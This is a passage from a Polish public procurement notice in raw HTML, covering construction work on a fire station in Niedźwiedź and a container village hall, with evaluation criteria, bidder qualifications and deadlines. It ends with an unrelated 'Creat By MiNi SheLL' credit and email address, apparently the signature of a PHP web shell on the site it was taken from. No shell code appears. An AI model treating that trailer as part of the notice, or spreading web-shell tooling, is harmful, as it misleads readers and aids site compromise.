Zakresem robót stanowiących przedmiot zamówień, o których mowa w ust. 6 pkt 1 będą prace z zakresu:<br/>Część 1: <br/>Usługi architektoniczne i podobne . <br/>Usługi projektowania architektonicznego. <br/>Usługi architektoniczne w zakresie obiektów budowlanych.<br/>Usługi architektoniczne w zakresie przestrzeni.<br/>Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów<br/>Kalkulacja kosztów, monitoring kosztów<br/>Nadzór nad robotami budowlanymi<br/>Nadzór nad projektem i dokumentacją<br/>Usługi architektoniczne, inżynieryjne i pomiarowe<br/>Usługi architektoniczne i dotyczące pomiarów budynków <br/>Ocena wpływu projektu budowlanego na środowisko naturalne<br/>Architektoniczne usługi zagospodarowania terenu<br/>Usługi nadzoru budowlanego <br/>Usługi nadzorowania placu budowy <br/>Doradcze usługi budowlane <br/>Usługi zarządzania budową <br/>Usługi zarządzania projektem budowlanym <br/>Roboty budowlane <br/>Przygotowanie terenu pod budowę <br/>Roboty budowlane w zakresie budowy obiektów sportowych<br/>Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne<br/>Badanie gruntu <br/>Roboty w zakresie zagospodarowania terenu<br/>Roboty w zakresie kształtowania terenu <br/>Roboty na placu budowy<br/>Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej <br/>Roboty budowlane w zakresie budynków <br/>Roboty konstrukcyjne <br/>Roboty budowlane w zakresie parkingów <br/>Konstrukcje z betonu zbrojonego <br/>Roboty kanalizacyjne zewnętrzne <br/>Roboty drogowe <br/>Prace dotyczące nawierzchni chodnikowych<br/>Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty specjalistyczne <br/>Prace dotyczące obróbki blacharskiej oraz kładzenie rynien<br/>Roboty przy wznoszeniu rusztowań <br/>Demontaż rusztowań <br/>Fundamentowanie <br/>Zbrojenie <br/>Betonowanie konstrukcji<br/>Roboty murarskie i murowe<br/>Roboty instalacyjne w budynkach <br/>Roboty instalacyjne elektryczne <br/>Inne instalacje elektryczne <br/>Instalowanie systemów alarmowych i anten <br/>Instalowanie przeciwpożarowych systemów alarmowych<br/>Ochrona odgromowa <br/>Instalacje niskiego napięcia <br/>Instalowanie stacji rozdzielczych <br/>Instalowanie systemów oświetleniowych i sygnalizacyjnych <br/>Instalowanie urządzeń oświetlenia zewnętrznego <br/>Roboty izolacyjne <br/>Izolacja cieplna <br/>Roboty w zakresie okładziny tynkowej <br/>Roboty instalacyjne wodno-kanalizacyjne i sanitarne <br/>Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych<br/>Instalowanie centralnego ogrzewania <br/>Instalowanie ogrodzeń, płotów i sprzętu ochronnego <br/>Roboty wykończeniowe w zakresie obiektów budowlanych<br/>Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie <br/>Instalowanie bram <br/>Instalowanie ścianek działowych <br/>Stolarka drewniana <br/>Kładzenie płytek <br/>Kładzenie terakoty <br/>Kładzenie glazury <br/>Roboty malarskie i szklarskie <br/>Roboty elewacyjne <br/>Pozostałe roboty budowlane wykończeniowe<br/>Roboty w zakresie usuwania gruzu</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty Zamawiający będzie się kierował kryteriami określonymi poniżej.<br/>2. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>3. Za najkorzystniejszą zostanie uznana oferta z najwyższą ilością punktów określonych w kryteriach.<br/>4. W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone<br/>oferty o takiej samej ilości przyznanych punktów, wezwie Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym<br/>przez Zamawiającego ofert dodatkowych zawierających nową cenę. Wykonawcy, składając oferty dodatkowe, nie mogą zaoferować<br/>cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.<br/>5. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych przez nich ofert<br/>lub innych składanych dokumentów lub oświadczeń. Wykonawcy są zobowiązani do przedstawienia wyjaśnień w terminie<br/>wskazanym przez Zamawiającego.<br/>6. Zamawiający wybiera najkorzystniejszą ofertą w terminie związania ofertą określonym w SWZ.<br/>7. Jeżeli termin związania ofertą upłynie przed wyborem najkorzystniejszej oferty, Zamawiający wezwie Wykonawcę , którego oferta<br/>otrzymała najwyższą ocenę, do wyrażenia, w wyznaczonym przez Zamawiającego terminie, pisemnej zgody na wybór jego oferty.<br/>8. W przypadku braku zgody, o której mowa w ust. 7, oferta podlega odrzuceniu, a Zamawiający zwraca sią o wyrażenie takiej zgody<br/>do kolejnego Wykonawcy, którego oferta została najwyżej oceniona, chyba, że zachodzą przesłanki do unieważnienia<br/>postępowania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2.	„Rozbudowa i przebudowa budynku OSP z infrastrukturą towarzyszącą w zabudowie usługowej w msc. Niedźwiedź”<br/>Przedmiotem zamówienia jest rozbudowa i przebudowa budynku osp z infrastrukturą towarzyszącą w zabudowie usługowej w miejscowości Niedźwiedź. <br/>Zakres projektowanych robót obejmuje:<br/>- rozbudowę budynku poprzez poszerzenie budynku w stronę północno-wschodnią z wykonaniem nowych pomieszczeń,<br/>- przebudowę budynku na parterze oraz na piętrze polegającą na zamurowaniu otworów okiennych od części rozbudowywanej oraz wykonaniu przejść łączących starą część budynku z nową.<br/>W związku z rozbudową i przebudową budynku na części istniejącej należy:<br/>• wykonać zamurowanie okna na parterze w pom. 1.06 wg. cz. rysunkowej;<br/>• wykonać zamurowanie okna na piętrze w pom. 2.02 wg. cz. rysunkowej;<br/>• wykonać rozbiórkę ściany na klatce schodowej na piętrze w celu wykonania przejścia z pom. 2.01 do pom. 2.08.<br/>Rozbudowa i przebudowa budynku polega na:<br/>• wykonaniu nowych fundamentów pod ściany i słupy zgodnie z częścią rysunkową;<br/>• wykonaniu ścian i słupów parteru i piętra oraz ścian działowych;<br/>• wykonaniu stropu żelbetowego parteru i stropu o konstrukcji lekkiej piętra;<br/>• wykonaniu więźby dachowej wraz z pokryciem;<br/>• montaż stolarki;<br/>• wykonaniu instalacji wewnętrznych;<br/>• wykonaniu posadzek, tynków;<br/>• wykonaniu elewacji budynku wraz z strukturą;<br/>• roboty wykończeniowe, malowanie ścian itd. <br/>Przedmiot zamówienia opisano szczegółowo w:<br/>a)	dokumentacji projektowej, która stanowi załącznik do SWZ zawierającej:<br/>- projekt budowlany, <br/>- specyfikacji technicznej wykonania i obioru robot budowalnych<br/>b)	przedmiar robót, który stanowi załącznik do SWZ.<br/><br/><br/>3.	„Budowa świetlicy wiejskiej wraz z infrastrukturą towarzyszącą w zabudowie usługowej ”<br/><br/>Zadanie polega na budowie świetlicy wiejskiej w zabudowie usługowej. Budynek przeznaczony będzie do spotkań wiejskich i wypoczynku mieszkańców. Budynek będzie się składał z 4 kontenerów o wymiarach 2,44 x 8,0 × 2,8 zbudowanych na ramach stalowych posadowionych na bloczkach betonowych.<br/>Projektowane ściany zewnętrzne wykonane z płyty warstwowej z rdzeniem z piany PIR gr. 120 mm. Dach zaprojektowano jako dwuspadowy o kacie nachylenia połaci 30°. Dach pokryty blacha stalowa powlekana fabrycznie o profilu trapezowym w barwach zbliżonych do naturalnych materiałów pokrycia dachowego na więźbie drewnianej w układzie krokwiowo-jętkowym.<br/>Budynek świetlicy wiejskiej z jedna sala przeznaczona do spotkań, wypoczynku 20 osób, bezpośrednio przy sali znajduje się wc ogólnodostępne dostosowane dla osób niepełnosprawnych, kuchnia oraz magazyn. W pomieszczeniu magazyn należy wyodrębnić sale przeznaczona na przedmioty porządkowe/utrzymania czystości.<br/><br/>wymiary zewnętrzne - 9,76 x 8,0 m3<br/>powierzchnia zabudowy - 78,08 m3<br/>powierzchnia netto - 73,14 m3<br/>powierzchnia użytkowa - 73,14 m3<br/>powierzchnia całkowita - 83,68 m3<br/>kubatura brutto - 329,30 m3<br/>wysokość budynku - 5,52 m3<br/>powierzchnia dachu - 111,82 m3<br/>kategoria zagrożenia ludzi - ZL III </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45215000-7 - Roboty budowlane w zakresie budowy obiektów budowlanych opieki zdrowotnej i społecznej, krematoriów oraz obiektów użyteczności publicznej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">6.	Zamawiający przewiduje udzielenie zamówień powtarzających.<br/>1)	Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 PZP, w okresie 3 lat od dnia udzielenia zamówienia podstawowego. Zamówienia te polegać będą na powtórzeniu robót podobnych do robót stanowiących przedmiot niniejszego zamówienia.<br/>2)	Zamówienia, o których mowa w ust. 6 pkt 1 będą polegały na powtórzeniu robót zgodnych <br/>z zakresem robót stanowiącymi przedmiot niniejszego zamówienia. Zakresem robót stanowiących przedmiot zamówień, o których mowa w ust. 6 pkt 1 będą prace z zakresu:<br/><br/>Część 2: <br/>Roboty budowlane w zakresie budowy obiektów użyteczności publicznej <br/>Roboty rozbiórkowe <br/>Roboty przygotowawcze <br/>Roboty ziemne <br/>Zbrojenie konstrukcji budowlanych <br/>Konstrukcje betonowe i żelbetowe <br/>Roboty murarskie <br/>Konstrukcje drewniane <br/>Roboty pokrywcze <br/>Tynki i okładziny <br/>Posadzki <br/>Stolarka <br/>Roboty malarskie <br/>Roboty izolacyjne <br/>Instalacja WOD-KAN <br/>Instalacja fotowoltaiczna kod <br/>Instalacje elektryczne <br/>Podbudowa <br/>Nawierzchnie z kostki brukowej</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty Zamawiający będzie się kierował kryteriami określonymi poniżej.<br/>2. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>3. Za najkorzystniejszą zostanie uznana oferta z najwyższą ilością punktów określonych w kryteriach.<br/>4. W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone<br/>oferty o takiej samej ilości przyznanych punktów, wezwie Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym<br/>przez Zamawiającego ofert dodatkowych zawierających nową cenę. Wykonawcy, składając oferty dodatkowe, nie mogą zaoferować<br/>cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.<br/>5. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych przez nich ofert<br/>lub innych składanych dokumentów lub oświadczeń. Wykonawcy są zobowiązani do przedstawienia wyjaśnień w terminie<br/>wskazanym przez Zamawiającego.<br/>6. Zamawiający wybiera najkorzystniejszą ofertą w terminie związania ofertą określonym w SWZ.<br/>7. Jeżeli termin związania ofertą upłynie przed wyborem najkorzystniejszej oferty, Zamawiający wezwie Wykonawcę , którego oferta<br/>otrzymała najwyższą ocenę, do wyrażenia, w wyznaczonym przez Zamawiającego terminie, pisemnej zgody na wybór jego oferty.<br/>8. W przypadku braku zgody, o której mowa w ust. 7, oferta podlega odrzuceniu, a Zamawiający zwraca sią o wyrażenie takiej zgody<br/>do kolejnego Wykonawcy, którego oferta została najwyżej oceniona, chyba, że zachodzą przesłanki do unieważnienia<br/>postępowania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.Zdolność techniczna lub zawodowa: <br/>W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu Zamawiający żąda złożenia następujących podmiotowych środków dowodowych w zakresie:<br/>1)	wykonanych robót.<br/>Na potwierdzenie niniejszego warunku należy złożyć wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty; <br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że w tym okresie wykonał:<br/>dla Części 1:<br/>•	dwie roboty budowlane zrealizowane w systemie „zaprojektuj i wybuduj” lub „wybuduj” w ramach których wykonano roboty związane z podobnym zakresem Wymagana wartość wykonanych robót wynosiła minimum: po 700 000,00 zł brutto każda.<br/>dla Części 2: <br/>•	jedna robota budowlana związana z budową lub przebudową lub rozbudową lub modernizacją lub remontem budynku kubaturowego. Wymagana wartość wykonanych robót budowlanych wynosiła minimum: 250 000,00 zł brutto każda;<br/><br/>Do każdej pozycji wykazu należy załączyć dowody określające, czy roboty te zostały wykonane w sposób należyty.<br/><br/>2. wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia publicznego.<br/>Na potwierdzenie niniejszego warunku należy złożyć wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia <br/>i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;<br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje:<br/>dla Części 1: <br/>•	Kierownikiem budowy posiadającym uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, posiadającym doświadczenie w pełnieniu samodzielnych funkcji technicznych w budownictwie, na co najmniej 1 inwestycji związanej z podobnym zakresem o wartości min. 3 000 000,00 zł brutto <br/>•	Projektantem w specjalności konstrukcyjno-budowlanej posiadającym uprawnienia budowlane uprawniające do projektowania, który zrealizował dokumentację projektową, która została wykonana i jest użytkowana o wartości dokumentacji projektowej min. 20 000,00 zł brutto.<br/>dla Części 2: <br/>•	Kierownikiem budowy posiadającym uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, posiadającym doświadczenie w pełnieniu samodzielnych funkcji technicznych w budownictwie, na co najmniej 1 inwestycji związanej z podobnym zakresem o wartości min. 1 000 000,00 zł brutto <br/><br/>Tym samym kierownikiem budowy można wykazać się do wszystkich Części.<br/><br/>Do wykazu osób należy dołączyć oświadczenie Wykonawcy, że zaproponowane osoby posiadają wymagane uprawnienia i przynależą do właściwej izby samorządu zawodowego, jeżeli taki wymóg na te osoby nakłada Prawo budowlane.<br/><br/>Zgodnie z art. 12a Prawa budowlanego który to odsyła do ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2020 r. poz. 220) przynależność do właściwej izby samorządu zawodowego nie jest wymagana od obywateli państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) gdyż do posiadania uprawnień w wykonywaniu samodzielnych funkcji w budownictwie nie jest wymagana przynależność do izby samorządu zawodowego.<br/><br/>3. Sytuacja ekonomiczna i finansowa:<br/><br/>W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu Zamawiający żąda złożenia następujących podmiotowych środków dowodowych:<br/>1)	Dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej <br/>w zakresie prowadzonej działalności związanej z przedmiotem zamówienia (wykonywaniem robót budowlanych) na sumę gwarancyjną określoną przez Zamawiającego nie mniejszą niż: <br/>dla Części 1: 1 000 000,00 zł brutto <br/>dla Części 2: 1 000 000,00 zł brutto <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)Wykaz wykonanych robót potwierdzający opisany warunek wraz z dowodami potwierdzającymi należyte wykonanie tych robót.<br/>2) Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z oświadczeniem o posiadanych uprawnieniach.<br/>3) Potwierdzenie, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wadium w wysokości: <br/>dla Części 1: 10 000,00 zł brutto; (słownie: dziesięć tysięcy złotych 00/100)<br/>dla Części 2: 5 000,00 zł brutto; (słownie: pięć tysięcy złotych 00/100)<br/>należy wnieść przed upływem terminu składania ofert. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku wnoszenia oferty wspólnej przez dwa lub więcej podmioty gospodarcze (konsorcja/spółki cywilne) oferta musi spełniać wymagania określone w art. 58 ustawy Prawo zamówień publicznych, w tym:<br/>1) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie z art. 58 ust. 2 ustawy Pzp Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia lub pełnomocnictwo do reprezentowania w postępowaniu i zawarcia umowy. W związku z powyższym niezbędne jest przedłożenie<br/>w ofercie dokumentu zawierającego pełnomocnictwo w celu ustalenia podmiotu uprawnionego do występowania w imieniu Wykonawców w sposób umożliwiający ich identyfikację.<br/>2) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika jaki zakres rzeczowy zamówienia realizować zamierzają poszczególni Wykonawcy.<br/>3) W celu wykazania niepodlegania wykluczeniu z postępowania o udzielenie zamówienia w rozdziale VII wymagane jest załączenie do oferty oświadczenia i przedłożenia na wezwanie dokumentów dla każdego konsorcjanta oddzielnie.<br/>2. W odniesieniu do Wykonawców wspólnie ubiegających się o udzielenie zamówienia Zamawiający wymaga aby:<br/>1) Doświadczeniem, o którym mowa w rozdziale V ust. 4 pkt 1 SWZ - w zakresie wykonanych robót wykazał się konsorcjant,<br/>który będzie wykonywał kluczowy zakres robót.<br/>2) Pozostałe warunki udziału w postępowaniu podlegają sumowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z zapisami określonymi w SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-02-16 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://bogoria.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-02-16 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Zamawiający dopuszcza możliwość ograniczenia liczby Wykonawców, których zaprosi do negocjacji ofert do trzech<br/>Wykonawców spośród najwyżej ocenionych w kryteriach oceny ofert, którzy w odpowiedzi na ogłoszenie o zamówieniu<br/>złożyli oferty, które nie podlegały odrzuceniu

Creat By MiNi SheLL
Email: jattceo@gmail.com